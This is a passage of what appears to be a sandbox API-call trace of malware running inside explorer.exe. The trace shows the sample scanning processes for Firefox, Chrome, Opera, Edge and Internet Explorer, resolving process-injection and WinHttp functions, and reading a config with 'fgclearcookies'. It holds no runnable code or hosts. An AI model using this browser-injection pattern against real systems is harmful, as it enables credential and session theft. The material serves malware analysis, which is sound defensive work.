alcohol.exe", lpString2="chrome.exe") returned 1 [0263.192] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0263.192] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0263.193] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0263.193] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0263.193] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0263.193] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0263.193] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.194] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0263.194] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0263.194] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0263.194] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0263.194] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.194] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.194] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.194] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.194] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.194] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0263.195] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0263.195] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0263.195] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0263.195] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0263.195] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.195] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.195] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.195] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.195] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.195] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.196] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0263.196] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0263.196] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0263.196] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0263.196] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.197] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.197] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.197] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.197] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0263.197] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.197] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0263.197] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0263.197] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0263.197] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0263.197] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.198] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0263.199] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.200] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.200] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.200] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.200] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0263.200] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0263.200] CloseHandle (hObject=0xe8) returned 1 [0263.200] Sleep (dwMilliseconds=0x3e8) Process: id = "15" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x533b2000" os_pid = "0x924" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\explorer.exe" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 196 os_tid = 0x920 [0162.095] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0162.095] GetProcAddress (hModule=0x76e30000, lpProcName="Sleep") returned 0x76e52b70 [0162.095] GetProcAddress (hModule=0x76e30000, lpProcName="ReadProcessMemory") returned 0x76e7bdc0 [0162.095] GetProcAddress (hModule=0x76e30000, lpProcName="LeaveCriticalSection") returned 0x76fa3000 [0162.095] GetProcAddress (hModule=0x76e30000, lpProcName="TerminateProcess") returned 0x76e7bca0 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32Next") returned 0x76e7a980 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatA") returned 0x76e7e110 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="ExitThread") returned 0x76f96930 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="MultiByteToWideChar") returned 0x76e45b50 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="RtlMoveMemory") returned 0x76e526d8 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="GetLastError") returned 0x76e52dd0 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpiA") returned 0x76e340a0 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualAlloc") returned 0x76e467a0 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="EnterCriticalSection") returned 0x76fa2fc0 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="FindClose") returned 0x76e4bd60 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0162.096] GetProcAddress (hModule=0x76e30000, lpProcName="OpenThread") returned 0x76e4c560 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="Process32Next") returned 0x76e8fcc0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32First") returned 0x76e7aa70 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="IsWow64Process") returned 0x76e391d0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="RemoveDirectoryW") returned 0x76e7bda0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleFileNameA") returned 0x76e464a0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleHandleA") returned 0x76e465e0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatW") returned 0x76e7e070 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="CreateMutexA") returned 0x76e47210 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="FindNextFileW") returned 0x76e41910 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e321e0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentThreadId") returned 0x76e43ee0 [0162.097] GetProcAddress (hModule=0x76e30000, lpProcName="CloseHandle") returned 0x76e52f80 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="DeleteFileW") returned 0x76e3ad90 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentProcessId") returned 0x76e45a50 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="OpenFileMappingA") returned 0x76e47230 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="WriteProcessMemory") returned 0x76e7bad0 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="SuspendThread") returned 0x76e32f60 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="SetFileAttributesW") returned 0x76e437a0 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="ResumeThread") returned 0x76e413a0 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="RtlZeroMemory") returned 0x76fa2eb0 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="OpenProcess") returned 0x76e4cad0 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="CreateRemoteThread") returned 0x76e7c4f0 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="InitializeCriticalSection") returned 0x76f78100 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcessHeap") returned 0x76e53050 [0162.098] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualFree") returned 0x76e41260 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="Process32First") returned 0x76e8fdb0 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="HeapFree") returned 0x76e53070 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="HeapAlloc") returned 0x76fa33a0 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualQuery") returned 0x76e4bd40 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="UnmapViewOfFile") returned 0x76e53580 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="MapViewOfFile") returned 0x76e3e390 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenA") returned 0x76e4caf0 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="FindFirstFileW") returned 0x76e4bd80 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpA") returned 0x76e91230 [0162.099] GetProcAddress (hModule=0x76e30000, lpProcName="HeapReAlloc") returned 0x76f83f20 [0162.099] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0162.099] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptDestroyHash") returned 0x7fefdbfdb00 [0162.099] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptReleaseContext") returned 0x7fefdbfdd10 [0162.100] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0162.100] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptGetHashParam") returned 0x7fefdbfdb20 [0162.100] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptCreateHash") returned 0x7fefdbfdad4 [0162.100] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptAcquireContextA") returned 0x7fefdbf8180 [0162.100] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0162.203] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0162.203] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0162.207] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0162.207] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsQuery_W") returned 0x7fefc5c01b0 [0162.207] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0162.208] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0162.208] GetProcAddress (hModule=0x76f50000, lpProcName="NtSetInformationProcess") returned 0x76fa14d0 [0162.208] GetProcAddress (hModule=0x76f50000, lpProcName="NtMapViewOfSection") returned 0x76fa1590 [0162.208] GetProcAddress (hModule=0x76f50000, lpProcName="LdrProcessRelocationBlock") returned 0x76ffb110 [0162.208] GetProcAddress (hModule=0x76f50000, lpProcName="NtUnmapViewOfSection") returned 0x76fa15b0 [0162.208] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7fefe4c0000 [0162.208] GetProcAddress (hModule=0x7fefe4c0000, lpProcName="SHGetSpecialFolderPathW") returned 0x7fefe4d98f0 [0162.208] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7fefdb70000 [0162.208] GetProcAddress (hModule=0x7fefdb70000, lpProcName="PathFindFileNameA") returned 0x7fefdb786c4 [0162.209] GetProcAddress (hModule=0x7fefdb70000, lpProcName="StrToIntA") returned 0x7fefdb8a7d0 [0162.209] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0162.209] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0162.209] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfA") returned 0x76dabae8 [0162.209] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0162.211] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpAddRequestHeaders") returned 0x7fef716bdcc [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReadData") returned 0x7fef715e1e0 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCrackUrl") returned 0x7fef715ba38 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetProxyForUrl") returned 0x7fef715e9c0 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpenRequest") returned 0x7fef71545f8 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCloseHandle") returned 0x7fef71522e0 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSetOption") returned 0x7fef71539c4 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReceiveResponse") returned 0x7fef715d068 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpConnect") returned 0x7fef7163e3c [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSendRequest") returned 0x7fef71574d0 [0162.212] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7fef716a56c [0162.212] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0162.213] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0162.213] VirtualProtect (in: lpAddress=0x50000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x1dfe50 | out: lpflOldProtect=0x1dfe50*=0x40) returned 1 [0162.213] VirtualProtect (in: lpAddress=0x50000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1dfe50 | out: lpflOldProtect=0x1dfe50*=0x4) returned 1 [0162.215] VirtualQuery (in: lpAddress=0x60023, lpBuffer=0x1dfde0, dwLength=0x30 | out: lpBuffer=0x1dfde0*(BaseAddress=0x60000, AllocationBase=0x60000, AllocationProtect=0x40, __alignment1=0xfffff880, RegionSize=0x7000, State=0x1000, Protect=0x40, Type=0x40000, __alignment2=0x0)) returned 0x30 [0162.215] GetProcessHeap () returned 0x260000 [0162.215] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x364) returned 0x2937e0 [0162.215] RtlMoveMemory (in: Destination=0x2937e0, Source=0x60023, Length=0x363 | out: Destination=0x2937e0) [0162.215] GetProcessHeap () returned 0x260000 [0162.215] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3400) returned 0x293b50 [0162.215] RtlMoveMemory (in: Destination=0x293b50, Source=0x60385, Length=0x3400 | out: Destination=0x293b50) [0162.215] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0162.217] GetProcessHeap () returned 0x260000 [0162.217] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xa000) returned 0x296f60 [0162.220] GetProcessHeap () returned 0x260000 [0162.220] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2b) returned 0x292f90 [0162.220] wsprintfA (in: param_1=0x292f90, param_2="%s%s" | out: param_1="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 42 [0162.220] OpenFileMappingA (dwDesiredAccess=0x6, bInheritHandle=0, lpName="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 0xd4 [0162.221] MapViewOfFile (hFileMappingObject=0xd4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2060000 [0162.221] lstrlenA (lpString="plugin_size=290955") returned 18 [0162.221] lstrlenA (lpString="fgclearcookies") returned 14 [0162.221] UnmapViewOfFile (lpBaseAddress=0x2060000) returned 1 [0162.221] CloseHandle (hObject=0xd4) returned 1 [0162.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0162.224] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.224] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0162.226] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0162.226] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0162.226] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0162.226] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.227] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0162.227] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0162.227] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0162.227] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0162.227] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.227] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0162.227] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0162.227] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0162.227] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.227] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.228] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0162.228] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0162.228] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0162.228] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.228] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.228] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0162.228] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0162.228] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0162.229] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.229] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.229] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0162.229] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0162.229] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0162.229] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.229] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.230] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0162.230] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0162.230] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0162.230] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.230] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.230] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0162.230] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0162.230] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0162.230] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.230] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.231] lstrcmpiA (lpString1="lsass.exe", 